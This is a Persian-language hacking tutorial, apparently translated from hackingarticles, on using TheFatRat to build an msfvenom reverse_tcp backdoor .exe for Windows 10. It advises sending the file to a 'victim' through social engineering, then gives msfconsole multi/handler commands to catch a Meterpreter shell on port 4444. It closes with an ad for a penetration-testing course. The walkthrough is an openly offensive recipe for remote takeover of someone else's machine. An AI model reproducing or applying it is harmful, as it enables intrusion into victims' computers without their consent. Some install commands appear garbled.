در این مقاله قصد دارم کار با ابزار TheFatRat را توضیح بدهم. در این مقاله یاد خواهیم گرفت که چگونه میتوان با استفاده از آنیک msfvenom backdoor ایجاد کنیم. همچنین یاد خواهیم گرفت که ایجاد یک reverse_tcp از سیستم قربانی دسترسی meterpreter بگیریم و به هک کردن windows 10 با TheFatRat بپردازیم.
نصب و اجرای برنامهی هک کردن windows 10 با TheFatRat
طبق تصویر زیر اقدام به clone کردن ابزار میکنیم.
وارد مسیر فایل میشویم و از دستور زیر برای نصب ابزار استفاده میکنیم.
fatrat/.
بعد از اجرای برنامهی هک کردن windows 10 با TheFatRat، منوی آن را مشاهده میکنید و با انتخاب گزینه ۱ و ساخت یک msfvenom backdoor ادامه میدهیم.
در قسمت بعد بسته به نوع سیستمعامل خروجی فایل را مشخص میکنیم. با توجه به سیستمعامل قربانی که windows 10 است گزینه دوم را انتخاب میکنیم تا خروجی آن فرمت exe باشد.
LHOST که همان ip آدرس local machine است. همچنین LPORT که پورتی است که reverse connection با آن برقرار میشود را مینویسیم و درستی ورودی را بررسی و با “y” آن را تائید میکنیم تا دسترسی از سمت قربانی به سمت هکر ارسال شود.
بعد از اتمام فرآیند خروجی در دایرکتوری output ذخیره میشود.
حالا با هر ترفندی که میتوانیم فایل را برای قربانی ارسال میکنیم. توصیه میشود که از روشهای مهندسی اجتماعی کمک بگیریم. با استفاده از msfconsole یک reverse handler که وظیفه listening روی پورت ما دارد ایجاد میکنیم. هر زمان که قربانی فایل را اجرا کرد meterpreter shell را بگیریم. در اینجا هک کردن windows 10 با TheFatRatبه اتمام میرسد.
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.0.104 (the attacker system IP)
- set lport 4444
- exploit
این مقاله از منبع hackingarticles ترجمهشده است.
امیدوارم از مقالهی هک کردن windows 10 با TheFatRat استفاده لازم را برده باشید. درصورتیکه علاقهمند به مباحث تست نفوذ شبکه هستید میتوانید در دوره SANSPack Level 1 آکادمی تک وان ۲۴ شرکت کنید.